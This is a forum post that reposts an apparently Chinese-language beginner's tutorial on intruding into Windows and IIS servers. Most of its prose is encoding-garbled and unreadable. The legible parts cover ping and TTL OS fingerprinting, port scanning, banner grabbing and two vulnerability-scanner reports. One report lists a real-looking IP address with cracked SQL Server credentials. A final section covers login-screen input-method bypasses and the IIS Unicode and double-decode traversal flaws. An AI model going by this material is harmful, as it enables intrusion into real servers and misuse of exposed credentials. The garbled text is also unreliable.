VFP ·R¥ÎªÌªÀ°Ï ­º­¶ VFP ·R¥ÎªÌªÀ°Ï
¥»°Q½×°Ï¬° Visual Foxpro ·R¥ÎªÌ¸gÅç¥æ¬yªº¦a¤è, ½Ð¦h¦h§Q¥Î"·j´M"ªº¥\¯à, ¥ý¬d¬Ý¬Ý¦³µL«e¨Ò¥i´`, ¦pªGÁÙ¦³¤£À´ªº¦Aµo°Ý. ³¡¥÷¥DÃD¦³ªþ¥[ÀÉ®×, ¶·¥ýµù¥U¦¨¬°ªÀ°Ï©~¥Á¤~¥i¥H¤U¸ü.
 
 ±`¨£°ÝÃD±`¨£°ÝÃD   ·j´M·j´M   ·|­û¦Cªí·|­û¦Cªí   ·|­û¸s²Õ·|­û¸s²Õ   ·|­ûµù¥U·|­ûµù¥U 
 ­Ó¤H¸ê®Æ­Ó¤H¸ê®Æ   µn¤JÀˬd±zªº¨p¤H°T®§µn¤JÀˬd±zªº¨p¤H°T®§   µn¤Jµn¤J

windows¤J«Iªì¯Å±Ðµ{

 
µoªí·s¥DÃD   ¦^ÂÐ¥DÃD    VFP ·R¥ÎªÌªÀ°Ï ­º­¶ -> Windows °Q½×°Ï
¤W¤@½g¥DÃD :: ¤U¤@½g¥DÃD  
µoªí¤H ¤º®e
Ruey



µù¥U®É¶¡: 2003-03-12
¤å³¹: 1698
¨Ó¦Û: tunglo

²Ä 1 ¼Ó

µoªíµoªí©ó: ¬P´Á¤» ¤G¤ë 07, 2004 11:02 am    ¤å³¹¥DÃD: windows¤J«Iªì¯Å±Ðµ{ ¤Þ¨¥¦^ÂÐ

§@ªÌ¡Ghuodingx ¨Ó·½¡G(¤õ¤B¤u§@«Ç) ¥[¤J®É¶¡¡G2003-6-16¡@ABCdown
URL ¡Ghuodingx.yeah.net
E-MAIL: huodingx@263.net
³o¨Ã¤£¬O¤°»òÅv«Â±Ð§÷¡A¥u¾A¦Xµæ³¾ÁA¸Ñwin¨t¦C¥D¾÷¦s¦bªº¤£¦w¥þ­±¡A¤Á²ö
¥Î¦¹¤èªk¦b°ê¤º°µ¹Á¸Õ¡A¦pªG§A°¾­n¦p¦¹¡A¨º»ò¥Ñ¦¹¤Þ°_ªº¤@¤Áªk«ß«áªG¥Ñ
§A¦Û¤v­t³d¡C
²Ä¹s³¡¤À

========¼g¦b«e­±ªº¼o¸Ü==========

³o¬O¤@¥÷µ¹ªì¾ÇªÌªº¤Jªù±Ðµ{¡A°ª¤â´N¤£¥²¬Ý¤F¡C
²×©ó©ñ°²¤F¡A´eÀYºÎ¤F¨â¤Ñ¡C¹ê¦b¶~µÛµL²á¡A½¤F½¸ê®Æ®w¡A¤°»ò¶Ã¤C¤KÁVªº¡A´N¾ã²z¤F³o¥÷ªF¦è¡C
­º¥ýÁn©ú¡A¥»¤H¤£¬O¶Â«È¡A¥u¬O­Ó´¶³qªººô¸ô¦w¥þ§Þ³N·R¦nªÌ(*^_^*¯u¬OÁy¬õ¡A¦näú¤ßªº¦WºÙ¡^¡C»¡¨ì³oùØ¡A§Ú·Q¦³¥²­n½Í½Í¤°»ò¬O¶Â«È¡A®¦¡K¡K¤@®É¥b·|¤]»¡¤£²M¡]½Ö¦b¼N§Ú¡H¡^¡C¦pªG¦³ªÅ¡A§A¤£§«ÅªÅª¡m°ê¤º¶Â«È°ª¤âªºÁpô¤èªk¡n¡m§AºÉ¤O¤F¶Ü¡n¡]¥»¯¸¦³¦¬¿ý¡^¡A¬Ý¬Ý¤°»ò¤~¬O¯u¥¿ªº°ª¤â¡C
¨ä¹ê¡A¹ï©ó¤J«I¨Ó»¡¡A§Ú¤@ª½¬Û«H³o¼Ë¤@¥y¸Ü¡A¦pªGºô¸ôºÞ²z­û¯à°÷¦hªá1%ªººë¤O¡A¨º»ò99%ªº§ðÀ»³£¥i¥H©Ú¤§ªù¥~¡]½Ö¡H½Ö¤S¦b¼N§Ú¡H¡^¡C¦³¤H¥i¯à­n°Ý¤F¡A³o»ò»¡§ðÀ»¨º¤£´N«ÜÃø¤F¡H¨þ¨þ¡K¡K¥i¬O´N¦³¨º»ò¦h½ÞÀYºôºÞ¡A¤@©w­nµ¥¤H§â¦Û¤vªº¯¸¶Â¤F¤§«á¡A¤~·Q¨ì­n¥´¸É¤B¡C
¬°¤°»ò·Q¨ì­n¼gwindowsªº±Ðµ{©O¡H­ì¦]À³¸Ó¦³«Ü¦h¤F¡C¨ä¤@¡A²{¦bºô¸ô¤Wwindowsªº¥D¾÷¹ê¦b¬O¤£¤Ö¡A¦Ü¤Ö°ê¤º¬O³o¼Ë¤F¡A¦³¤H»¡¦³10%¡A§Ú¬Ý®t¤£¦h¦³50%¡]¨þ¨þ¡K¡K¤]³\¸Ø±i¤F¡I¡^¤G¡Cwindowsªºº|¬}¤Ó¦h¡A¤ÓÂø¡C¤T¡A¡K¡Kµ¥µ¥¡]¤S¼N¡I¡^¡C
·L³nªºIIS¦øªA¾¹¥Ñ©ó¨ä¨Ï¥ÎªºÂ²«K¡A³Q°ê¤º¤j³¡¤À¤¤¤pºô¯¸¨Ï¥Î¡C¦ý¬O¡A¤]´N¬O¦]¬°¥¦ªº¨Ï¥Î²«K¡A¥u¬O·L³n¦øªA¾¹¤@ª½¦¨¬°¶Â«È³Ì³ßÅw§ðÀ»ªº¥Ø¼Ð¡A©ó¬O¡A´X¥G¤j®a¤w¸g§Î¦¨¤@­Ó¤ßùØ©w¦¡¡A¨º´N¬O·L³nªº¦øªA¾¹¬O¤£¦w¥þªº¡B¯Ü®zªº¡C

¡@¡@¨ä¹ê³o­Ó§Ú­Ì§Ú­ÌÀ³¸Ó¤@¤À¬°¤Gªº¬Ý¡A¤@¬O·L³nªº¨t²Î¥»¨­ªº°ÝÃD¡A¤£¥i§_»{¡A·L³nªº¨t²Î¯S§O¬OIISªº½T¦³¸û¦hº|¬}¡A¦³¨Çº|¬}³]¸m«Â¯Ù¨ì³o­Ó¨t²Îªº¦w¥þ¡F¥t¤@¤è«K¡A°ê¤ºªº¤j¦h¼ÆºôºÞ¨ä¹ê¨Ã¨S¦³¯u¥¿ªº¬ã¨s¹L¨t²Îº|¬}¬Æ¦Ü§¹¥þ¨S¦³¥J²Ó³]¸m¹LIISªº¦w¥þ¡A©Ò¥H¡A²{¦b§Ú­Ì¥u­n¦bºô¤WÀH«K§ä´N¥i¥H§ä¨ì«Ü¦h´X¦~«eªº´Nµo²{ªºIISº|¬}ªº¦øªA¾¹¡A³o¤£¯à¤£»¡¬OºôºÞªº³d¥ô¡C ¨ä¹ê¡A¦pªG°t¸m±o·í¡Awindowsªº¦w¥þ©ÊÁÙ¬O¥i¥HÅý¤H©ñ¤ßªº¡C

¤J«I¤@­Ó¨t²Î¦³«Ü¦h¨BÆJ¡A¶¥¬q©Ê«Ü±jªº¡§¤u§@¡¨¡A¨ä³Ì²×ªº¥Ø¼Ð¬OÀò±o¶W¯Å¥Î¤á³\¥iÅv¡X¡X¹ï¥Ø¼Ð¨t²Îªºµ´¹ï±±¨î¡C±q¹ï¸Ó¨t²Î¤@µL©Òª¾¶}©l¡A§Ú­Ì§Q¥Î¨ä´£¨Ñªº¦UºØºô¸ôªA°È¦¬¶°Ãö©ó¥¦ªº¸ê°T¡A³o¨Ç¸ê°T¼ÉÅS¥X¨t²Îªº¦w¥þ¯Ü®z©Ê©Î¼ç¦b¤J¤f¡FµM«á§Ú­Ì§Q¥Î³o¨Çºô¸ôªA°È©T¦³ªº©Î°t¸m¤Wªºº|¬}¡A¸Õ¹Ï±q¥Ø¼Ð¨t²Î¤W¨ú¦^­«­n¸ê°T¡]¦p¤f¥OÀÉ¡^©Î¦b¤W­±°õ¦æ©R¥O¡A³q¹L³o¨Ç¿ìªk¡A§Ú­Ì¦³¥i¯à¦b¸Ó¨t²Î¤WÀò±o¤@­Ó´¶³qªºshell¤¶­±¡F±µ¤U¨Ó¡A§Ú­Ì¦A§Q¥Î¥Ø¼Ð¨t²Î¥»¦aªº§@·~¨t²Î©ÎÀ³¥Îµ{¦¡ªºº|¬}¸Õ¹Ï´£¤É§Ú­Ì¦b¸Ó¨t²Î¤Wªº³\¥iÅv¡AĄ̊ú¶W¯Å¥Î¤á±±¨î¡F¾A·íªºµ½«á¤u§@¥]¬AÁôÂè­¥÷¡B®ø°£²ª¸ñ¡B¦w¸m¯S¬¥¥ì¤ì°¨©M¯d«áªù¡C

¼o¸Ü»¡¤F¨º»ò¦h¡K¡K¤£»¡¤F¡C

²Ä¤@³¡¤À

===========±½´y===================

³o¤@¨B¥i¥HºÙ§@¸ê°Tªº¦¬¶°¡C±q¹ï§ðÀ»¥Ø¼Ð¤@µL©Òª¾¶}©l¡A³q¹LºØºØ¹Á¸Õ¡AÀò±o¶V¨Ó¶V¦hªºÃö©ó¥¦ªº¸ê°T¡F§ðÀ»ªÌªº­õ¾Ç¬O¡G¨S¦³µL¥Îªº¸ê°T¡C´X¥GÃö©ó§ðÀ»¥Ø¼Ðªº¥ô¦óª¾Ãѳ£¬O¥i¯àªº¤J«I¤J¤f¡AÁ|¤Z§@·~¨t²ÎÃþ«¬¡Bª©¥»¡B¥Î¤á¦Wµ¥¡A§Y¨Ï¬O¤@¨Çªí­±¤WµL®`ªº¸ê°T¡A¤]¥i¯à³q¹L©M§Oªº¸ê°Tºî¦X¦Óºc¦¨¼ÉÅS¨t²Îº|¬}ªº®ø®§¡C
¨ä¹ê¡A¤j¦h¼Æ§ðÀ»³Ìªì¬O¨S¦³©ú½Tªº¥Ø¼Ðªº¡C½Ñ¦ì¬Ý©x¥i¯à­n¥¢±æ¤F¡I¦]¬°¤Ó¦hªº¹q¼v¬ü¤Æ¤F§ðÀ»ªÌªº§Î¶H¡A¦n¶H¥L­Ì­Ó­Ó¬O¤Ñ¤~¡A·Q·F¤°»ò´N¯à·F¤°»ò¡C¦Ó¨Æ¹ê¬O§ðÀ»¬O¤@ºØ«Ü¥F¨ýªº¤u§@¡C¦¬¶°¸ê°T--¡n´ú¸Õ--¡n¥¢±Ñ--¡n¦A¦¬¶°--¡n¦A¸Õ--¡n¦A¥¢±Ñ¡K¡K--¡n¥u¨ì¦¨¥\¡C®@¡A¶]ÃD¤F^_^!
¹ï©ó±½´y¾¹ªº¿ï¾Ü¡A¥»¤H¨p¤U±ÀÂˤpº_ªº¬y¥ú¡]www.netxeyes.com)©Mxfocusªºx-scan(www.xfocus.net)¡C¦Ó¬y¥úµL½×¦b³t«×©M·Ç½T©Ê¤W¦ü¥G³£§ó³Ó¤@Äw¡A¦ý¬O¬y¥ú¦³ip­­¨î©M®É¶¡­­¨î¡A¤£²n¡I¨ä¹ê¡A¬y¥ú¤£¤î¦³±½´y¥\¯à¡C¥¦¹ê¦b¤Ó±j¤j¤F¡A¦pªG§A·Q¦¨¬°¤@­Ó¯u¥¿ªº°ª¤â¡AÁÙ¬O¤Ö¥Î¬°¦n¡Cx-scanÁöµM³t«×¤°»òªº¤£¬O«Ü¦n¡A¦Ó¥B¤£Ã­©w¡A¦ý¥¦ªº¡§º|¬}¸ê®Æ¡¨¥»¨­´N¬O¤@¥÷«Ü¦nªº¤Jªù±Ðµ{¡AÁöµM¤£¬O«Ü¸Ô²Ó¡A¦ý¥¦´£¨Ñ¤F¤@­Ó«Ü¦nªº¤è¦V,¤£¹L¡A1.2ª©¥»¤§«á¡A«ç»ò¦¨­^¤åªº¤F¡C
1¡Cping
¥ý¥Îping©R¥O¬Ý¬Ýip¬O¤£¬O¦s¬¡¡C
c:\>ping www.xxx.edu.cn

Pinging www.xxx.edu.cn [xxx.xxx.xxx.xxx] with 32 bytes of data:

Reply from xxx.xxx.xxx.xxx: bytes=32 time=50ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116
Reply from xxx.xxx.xxx.xxx: bytes=32 time=40ms TTL=116

Ping statistics for xxx.xxx.xxx.xxx:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 40ms, Maximum = 50ms, Average = 42ms
c:\>_
¨ä¤¤¡Aªð¦^ªºxxx.xxx.xxx.xxx´N¬O¸Ó¥\¯àÅܼƦWºÙ©Ò¹ïÀ³ªºip¡C
§Ú­Ìª`·N,ttl¡G«ü©w¸ê®Æ³ø³Q¸ô¥Ñ¾¹¥á±ó¤§«e¤¹³\³q¹Lªººô¬q¼Æ¶q¡C
TTL ¬O¥Ñµo°e¥D¾÷³]¸mªº¡A¥H¨¾¤î¸ê®Æ¥]¤£Â_¦b IP ¤¬Ápºô¸ô¤W¥Ã¤£²×¤î¦a°j°é¡C
Âàµo IP ¸ê®Æ¥]®É¡A­n¨D¸ô¥Ñ¾¹¦Ü¤Ö±N TTL ´î¤p 1¡I
UNIX ¤ÎÃþ UNIX §@·~¨t²Î ICMP ¦^ÅãÀ³µªªº TTL Äæ¦ì­È¬° 255
Compaq Tru64 5.0 ICMP ¦^ÅãÀ³µªªº TTL Äæ¦ì­È¬° 64
·L³n Windows NT/2K§@·~¨t²Î ICMP ¦^ÅãÀ³µªªº TTL Äæ¦ì­È¬° 128
·L³n Windows 95 §@·~¨t²Î ICMP ¦^ÅãÀ³µªªº TTL Äæ¦ì­È¬° 32
¦³ªº¸g¹L­×§ïµù¥Uªí¥i¥H­×§ïttlªð¦^ªº­Èªº¡I
±q³oùاڭ̥i¥H¤j­P§PÂ_¥X¹ï¤è¥D¾÷ªº¨t²ÎÃþ«¬¡A¦]¬°¤j¦h¼ÆºôºÞ¬O¤£·|§ïttl­Èªº ¡C

2¡C°ð±½´y
°ð±½´y¬O³q¹L±½´y§ä¥X¥Ø¼Ð¨t²Î¶}©ñªºªA°È°ð±q¦Ó±ÀÂ_¥X¥Ø¼Ð¨t²Î¤W¹B¦æªºªA°È¡A³q¹L³o¨ÇªA°È¥i¯àÀò¨ú¶i¤@¨Bªºª¾Ãѩγq©¹¨t²Îªº¸ô®|¡C°ð±½´yªºµ{¦¡©Ò¦b¦h¦³¡A¥i±qºô¤W§K¶OÀò¨ú¡C¦px-port¡A¬y¥ú©Mx-scan¤]³£¤¤©M¤F°ð±½´y¥\¯à¡C
¦³¿³½ìªº¸Ü¥i¥H¬Ý¬ÝservicesÀÉ¡A¥¦¦C¥X¤F¤@¨ÇªA°È©M»P¤§¹ïÀ³ªº°ð¸¹¡C
c:\windows>edit services
¤@¯ë¨Ó»¡¡AªA°È¶}ªº¶V¦h¡Aº|¬}´N¶V¦h¡A¾÷·|¤]´N¶V¦h¡C

¼g¨ì³oùØ¡A³s§Ú³£¦³ÂI·Ð¤F¡A»¡¨Ç¤°»òªF¦è§r¡H³£¤°»ò¦~¥N¤F¡AÁÙ»¡³o¨Ç¦Ñ±¼¤úªºªF¦è¡C²{¦bªº§ðÀ»¥i¥H»¡¬OÅܪº«Ü²³æ¤F¡Aºô¸ô¤W¤°»ò¤u¨ã³£¦³¡C¤@­Óº|¬}¥X¨Ó¡A°¨¤W´N¦³¬ÛÀ³ªº´ú¸Õ©Î§ðÀ»µ{¦¡¥X¨Ó¡C§ðÀ»ªÌ¥u­n®³¨Ç²{¦¨ªºªF¦è¥Î¡C¤°»ò¡H²{¦¨ªº³nÅ餣·|¥Î¡H¤j­ô¡A¤£­n¶}ª±¯º¤F¡AÀ°§UÀÉ·|¬Ý»ò¡H¤°»ò¡A¤£¬O§a¡AÁÙ¬O¤£·|¡A¨º§ÚÀ°¤£¤F§A¤F¡C

§Ú­ÌÁÙ¬O¨Ó¬Ý¬Ý«ç»ò§PÂ_¨t²Î¡Aª`·N§Ú­Ì»¡ªº¬Owindows¨t¦C¡A¤@¯ë¨Ó»¡¡A²{¦b³s¦binternet¤Wªº¦øªA¾¹°£¤Fwin NT´N¬Owin2000¤F¡A«ç»ò°Ï¤À©O¡H
¥i¥H¿é¤J¦p¤U©R¥O¡G
telnet xxx.xxx.xxx.xxx 80
GET INDEX.HTML
¥i¥H¬Ý¨ì¦^Åã: Microsoft-IIS/4.0©Î: Microsoft-IIS/5.0¡C¦pªG¬O: IIS 4.0¨º»ò¨t²Î·¥¦³¥i¯à¬ONT¡C¦pªG¬O: 5.0ªº¡A¨º»ò´N¬O2000¤F¡C¦ý¦³¨Ç¦øªA¾¹§âWEB¹B¦æ¦b
8080¡A81¡A8000¡A8001¤f¡A§A´NTELNET¬ÛÀ³ªº¤f¤W¡C
¨ä¹ê²{¦bªº±½´y¾¹¯uªº¬O«Ü¦n¡A®Ú¥»´N¥Î¤£µÛ³o»ò³Â·Ð¡A±½§¹¤§«á¡A¬Ý¤@¤U³ø§i´N¤°»ò³£¦³¤F¡C
¯u¬O¬\Àê°Ú¡I¡]§Ú³£¥´«¢¤í¤F¡K¡K¨þ¨þ¡A¦­¤W¤TÂI¤F¡C¡^²{¦b¨ÓÂI¥Í°Êªº¡A§Ú­Ì¨Ó¬Ý2¥÷¬y¥úªº³ø§i¡C
¡]¥Ñ©ó¡A²Ä¤@¥÷³ø§i¥i¯à·|¼ÉÅS¤õ¤Bªº¨­¥÷¡A¬GÁô¥h¡C¡^

-------------------------------------------------------------------
-------------------------------------------------------------------
http://www.netXeyes.com

http://www.netXeyes.org

¡i¤pº_§@«~¡j

¤pº_³nÅé¹êÅç«Ç 1995-2001

xxx.xxx.xxx.xxx

------------------------------------------------------------------

°ð±½´y

80(HTTP)

21(FTP Control)

25(SMTP)

443(HTTPS)

5631(PCAnyWhere)

3306(MYSQL)

---------------------------------------------------------------------

FTP±½´y

FTPª©¥»¸ê°T: Serv-U FTP ¦øªA¾¹ v3.0 for WinSock ´Nºü...

---------------------------------------------------------------------

SMTP±½´y

SMTPª©¥»¸ê°T: 220-xxxx.xxx.edu.cn Microsoft SMTP MAIL ready at Thu, 3 Jan 2002 21:21:24 +0800 Version: 5.5.1775.675.6 220 ESMTP spoken here

¤ä«ùVRFY

---------------------------------------------------------------------

CGI±½´y


WEBª©¥»¸ê°T: Microsoft-IIS/4.0

WWW ¼ÐÃD: ¡G¡G¡G­È±o¬°¦Û¤v©ñ¤@¤Ñ°²¡I¡I

±½´y¦¨¥\CGIº|¬}

/msadc/samples/adctest.asp (HTTP: 200 )

/scripts/tools/newdsn.exe (HTTP: 200 )

/scripts/tools/mkilog.exe (HTTP: 200 )

/scripts/tools/getdrvrs.exe (HTTP: 200 )

/scripts/tools/dsnform.exe (HTTP: 200 )

/scripts/iisadmin/bdir.htr (HTTP: 200 )

/msadc/samples/selector/showcode.asp (HTTP: 200 )

/msadc/Samples/SELECTOR/showcode.asp (HTTP: 200 )

/msadc/samples/adctest.asp (HTTP: 200 )

/msadc/msadcs.dll (HTTP: 200 )

/default.asp+.htr (HTTP: 200 )

/default.asp::$DATA (HTTP: 200 )

/default.asp%81 (HTTP: 200 )

/iisadmpwd/aexp4b.htr (HTTP: 200 )

/iisadmpwd/aexp4.htr (HTTP: 200 )

/iisadmpwd/anot.htr (HTTP: 200 )

/iisadmpwd/aexp.htr (HTTP: 200 )

/iisadmpwd/anot3.htr (HTTP: 200 )

/iisadmpwd/aexp3.htr (HTTP: 200 )

/iisadmpwd/aexp2.htr (HTTP: 200 )

/iisadmpwd/aexp2b.htr (HTTP: 200 )

/iisadmpwd/achg.htr (HTTP: 200 )

/IISADMPWD/achg.htr (HTTP: 200 )

/_AuthChangeUrl? (HTTP: 200 )

/_AuthChangeUrl (HTTP: 200 )

/?PageServices (HTTP: 200 )

---------------------------------------------------------------------

MISC


MySQL Version is: 3.23.35a?

²q¸Ñ¦¨¥\¥Î¤á±b¸¹ root:(NULL)

-------------------------------------------------------------------------
-------------------------------------------------------------------------
³o¬O¤@¥÷¨å«¬ªºNT¦øªA¾¹º|¬}³ø§i¡A¤U­±³o¤@¥÷¬O2000ªº¡C

-----------------------------------------------------------------------
-----------------------------------------------------------------------


http://www.netXeyes.com

http://www.netXeyes.org

¡i¤pº_§@«~¡j

¤pº_³nÅé¹êÅç«Ç 1995-2001

211.100.17.158 (211.100.17.158)
-------------------------------------------------------------------

°ð±½´y


80(HTTP)

25(SMTP)

80(HTTP)

53(DNS)

443(HTTPS)

------------------------------------------------------------------------

SMTP±½´y

SMTPª©¥»¸ê°T: 220 zhihongweb Microsoft ESMTP MAIL Service, Version: 5.0.2195.2966 ready at Fri, 23 Nov 2001 17:41:10 +0800

¤ä«ùVRFY

-------------------------------------------------------------------------

MSSQL±½´y

²q¸Ñ¦¨¥\¥Î¤á±b¸¹ sa:(NULL) zhihong:zhnet75717

-------------------------------------------------------------------

CGI±½´y


WEBª©¥»¸ê°T: Microsoft-IIS/5.0

WWW ¼ÐÃD: ¤¤ÂEºô-->±M·~ªººô¤W±Ð¾Ç¸ê·½®w

±½´y¦¨¥\CGIº|¬}

/scripts/samples/search/simple.idq (HTTP: 200 )

/scripts/samples/search/queryhit.idq (HTTP: 200 )

/scripts/samples/search/query.idq (HTTP: 200 )

/scripts/samples/search/qsumrhit.htw (HTTP: 200 )

/scripts/samples/search/qfullhit.htw (HTTP: 200 )

/scripts/samples/search/filetime.idq (HTTP: 200 )

/scripts/samples/search/author.idq (HTTP: 200 )

/scripts/samples/search/filesize.idq (HTTP: 200 )

/iissamples/issamples/query.idq (HTTP: 200 )

/iissamples/issamples/oop/qsumrhit.htw (HTTP: 200 )

/iissamples/exair/search/search.idq (HTTP: 200 )

/iissamples/issamples/fastq.idq (HTTP: 200 )

/iishelp/iis/misc/iirturnh.htw (HTTP: 200 )

/index.asp%81 (HTTP: 200 )

/iissamples/issamples/oop/qfullhit.htw (HTTP: 200 )

/iissamples/exair/search/qsumrhit.htw (HTTP: 200 )

/iissamples/exair/search/query.idq (HTTP: 200 )

/iissamples/exair/search/qfullhit.htw (HTTP: 200 )

/blabla.idq (HTTP: 200 )

/abczxv.htw (HTTP: 200 )

/?PageServices (HTTP: 200 )

/*.idq (HTTP: 200 )

/*.ida (HTTP: 200 )

-----------------------------------------------------------------

Plugins


IIS5.0 .Printer Exploit(Grant System Privileges)

-------------------------------------------------------------------
-------------------------------------------------------------------

´NÅý³o¨â¥÷³ø§i§â§Ú­Ì±a¤J¤U¤@³¡¤À¡]¶ã¡K¡K¦n§x¡IºÎ¤F.©ú¤Ñ¦A¶}©l¶i¤J²Ä¤G³¡¤À§a¡A¦A¦³´X¤Ñ´N¹L¦~¤F¡^¡C

²Ä¤G³¡¤À

================º|¬}§Q¥Î===============

§Ú¤@ª½¦b¦Ò¼{³o¤@³¡¥÷ªºÃD¥Ø¥s¤°»ò¦n©O¡H¦b¦w¥þ¬É¦³³o¼Ë¤@­Ó³N»y¥s¡§exploit¡¨¡A«Ü©úÅ㪽ĶªÖ©w¤£¹ï¡A§Ú¤@ª½¤£¬O«Ü²M·¡«ç»ò½Ķ¡C§Ú·Q¤j·§´N¬O¡§º|¬}§Q¥Î¡¨³o­Ó·N«ä¡C¨ä¹ê«üªº¬Oµ{¦¡©Î¤u¨ã¡A¦Ó²{¦b¬O§Ú·Q»¡ªº¬O¹Lµ{©M¤èªk¡C
³oùØ¡A§Ú·Q§@¤@ÂI»¡©ú¡A´N¬O¥H¤U©ÒÁ¿ªº¡A¤£¬O¤W­±¨â¥÷³ø§iªº¤ÀªR¡C¦Ó¬O¹ï©Ò¦³windwos¥i¯à¥X²{º|¬}ªº§ðÀ»¤èªkªº¤¶²Ð¡C©Ò¥H¤W­±¨S¦³±½¨ìªºº|¬}¡A¤U­±¤]·|敍­z¨ì¡C
·íµM¡A¤]¬O¤£¥i¯à¨C¤@¼Ë³£¤¶²Ð¨ì¡A¦pªG¦³°ª¤â¦³¤°»ò«ü±Ðªº¸Ü¡A½Ðµo«H¨ìhuodingx@263.net§Úªº¶l½c¡A©ÎªÌ¡A¨ì§Úªº­Ó¤H¥D­¶http://huodingx.yeah.net,¤j®a¥æ¬y¡A¥æ¬y¡C
¨ä¹ê¡A±q¤@¶}©l¥´ºâ¼g³o¥÷ªF¦è¡A§Ú¤]¤£ª¾¹D­n§â¥¦°µ¦¨¤°»ò¼Ë¡A´N·Q¼g¨ì¨º¡Aºâ¨º¡C¤£¹L¡A²{¦b¦³ÂI¬Ü¥Ø¤F¡A¨þ¨þ¡K¡K¦³ÂI¼Ë¤l¤F¡C


------¿é¤Jªkº|¬}-------------

Ãö©ó³o­ÓªFªF¡Awindwos2000¤@±À¥X¡Aºô¤W´N¦³³ø¾É¤F¡A¥i¥H¶¹L¤f¥Oµn³°¦Ó¶i¤Jwindows¡C¨ãÅé°µªk¬O¡A·í¬Ý¨ìwindwosªºµn³°¤¶­±¡A´N«ö§Ö±¶Áä¤Á´«¿é¤Jªk¨ì¥þ«÷¿é¤Jªk¡AÂIÀ»·Æ¹«¥kÁä¡A¥´¶}¡§À°§U¡¨¡A¬Ý¨ì¦³Ãìµ²ªº¦a¤è¡A«ö¦íctrlÁä¡A¦P®ÉÂIÀ»¥kÁä¡A³o®É·|¥´¶}¤@­ÓIEµøµ¡¡C¨þ¨þ¡K¡K¨ì¤F³oùØ¡Aª¾¹D«ç»ò°µ¤F§a¡C¦b¦ì§}Ä椤¿é¤Jc¡G\
´N·|¥X²{c½Lªº¤º®e¡C¦b¥Î¤áºÞ²z¨ºùØ¡A§A¬Æ¦Ü¥i¥H©¹Administrators²ÕùزK¥[¥Î¤á¡C
Ãö©ó»·ºÝ§Q¥Î³o­Óº|¬}¡A¦pªG¹ï¤è¥D¾÷¡A¶}3389°ðªº»·ºÝµn³°ªA°È¡A¨º»ò§A¥i¥H¥Îªþ¥ó¤¤ªº»·ºÝµn³°ªº¥Î¤áºÝµ{¦¡¶i¦æµn³°¡A³s±µ«á´N¸ò¾Þ§@¦Û¤vªº¾÷¾¹¤@¼Ë¡A¦pªG¦³¿é¤Jªkº|¬}¡A´N¥i¥H«ö·Ó¤W­z¤èªk¶i¦æ´ú¸Õ¡C¤õ¤B«Ü¬O¤£©¯¡A¤@ª½¨S¦³¾÷·|»·ºÝ´ú¸Õ¡C¤£¹L¦Û¤vªº¾÷¾¹¡A¨ì¬O¸Õ¹L¡C


--------IIS unicodeº|¬}--------
Ãö»P³o­Óº|¬}¡A§Ú¤]¤£·Q¦h»¡¤°»ò¡Cºô¤W¦³¦¨¾·ªº¤å³¹¤¶²Ð¥¦¡C¥»¯¸¤]¦¬¿ý¤F¡municode½s½Xº|¬}¥þ§ð²¤¡n¡]1-8¡^¦pªG§A¥þŪ§¹¤F¡A¹ï³o­Óº|¬}ªº§Q¥Î°ò¥»¬O¨S¤°»ò°ÝÃD¤F¡C5¤ë¥÷¡A¤¤¬üºô¸ô¤j¾Ô¡A°ê¤ºªº¤@¨Ç©Ò¿×ªº¬õ«È¡A´N¬O§Q¥Î³o­Óº|¬}¡A§ï¤F¤j¶qªº¬ü°ê¥D­¶¡C¤]¬O¤§©Ò¥H¤@¨Ç¤H»{¬°­þ¦¸§ðÀ»§Þ³N§t¶q¤£°ªªº­ì¦]¡C ³Ì¦­¬O¥ÑNSFOCUS¦w¥þ¤p²Õªº°K­ôµo²{·L³nIIS 4.0©MIIS 5.0¦bUnicode¦r¤¸¸Ñ½Xªº¹ê²{¤¤¦s¦b ¤@­Ó¦w¥þº|¬}¡A¾É­P¥Î¤á¥i¥H»·ºÝ³q¹LIIS°õ¦æ¥ô·N©R¥O¡C·íIIS¥´¶}ÀɮɡA ¦pªG¸ÓÀɮצW¥]§tunicode¦r¤¸¡A¥¦·|¹ï¨ä¶i¦æ¸Ñ½X¡A¦pªG¥Î¤á´£¨Ñ¤@¨Ç¯S®í ªº½s½X¡A±N¾É­PIIS¿ù»~ªº¥´¶}©ÎªÌ°õ¦æ¬Y¨Çweb®Ú¥Ø¿ý¥H¥~ªºÀÉ¡C

------------IIS CGIÀɮצW¤G¦¸¸Ñ½Xº|¬}---------

¨ä¹ê¡A³o­Óº|¬}Ãþ¦ü»Punicode¡C§Q¥Î³o­Óº|¬}¡A§Ú­Ì¥i¥H¶H§Q¥Îunocodeº|¬}¤@¼Ë¹B¦æ»·ºÝ¥D¾÷ªºdos©R¥O¡A§ðÀ»¤èªk°ò¥»¬Û¦P¡C
ºñ·ùwww. nsfocus.com2001¦~5¤ë15¤é¦bºñ·ù¤ë¥Z²Ä21´Á¤½§G¤FMicrosoft IIS CGIÀɮצW¿ù»~¸Ñ½Xº| ¬}¡C ¸Óº|¬}¬O¥Ñ©óiIIS¦b¸ü¤J¥i°õ¦æCGIµ{¦¡®É¡A·|¶i¦æ¨â¦¸¸Ñ½X¡C²Ä¤@¦¸¸Ñ½X¬O¹ïCGIÀɮצW¶i ¦æhttp¸Ñ½X¡AµM«á§PÂ_¦¹ÀɮצW¬O§_¬°¥i°õ¦æÀÉ¡A¨Ò¦pÀˬd§À½X¦W¬O§_¬°".exe"©Î".com"µ¥µ¥¡C¦bÀɮצW Àˬd³q¹L¤§«á¡AIIS·|¦A¶i¦æ²Ä¤G¦¸¸Ñ½X¡C¥¿±`±¡ªp¤U¡AÀ³¸Ó¥u¹ï¸ÓCGIªº°Ñ¼Æ¶i¦æ¸Ñ½X¡AµM¦Ó¡AIIS¿ù»~¦a ±N¤w¸g¸Ñ½X¹LªºCGIÀɮצW©MCGI°Ñ¼Æ¤@°_¶i¦æ¸Ñ½X¡C³o¼Ë¡ACGIÀɮצW´N³Q¿ù»~¦a¸Ñ½X¤F¨â¦¸¡C

³q¹Lºë¤ßºc³yCGIÀɮצW¡A§ðÀ»ªÌ¥i¥H¶¹LIIS¹ïÀɮצW©Ò§@ªº¦w¥þÀˬd¡A¨Ò¦p¹ï"../"
©Î"./"ªºÀˬd¡A¦b¬Y¨Ç±ø¥ó¤U¡A§ðÀ»ªÌ¥i¥H°õ¦æ¥ô·N¨t²Î©R¥O¡C

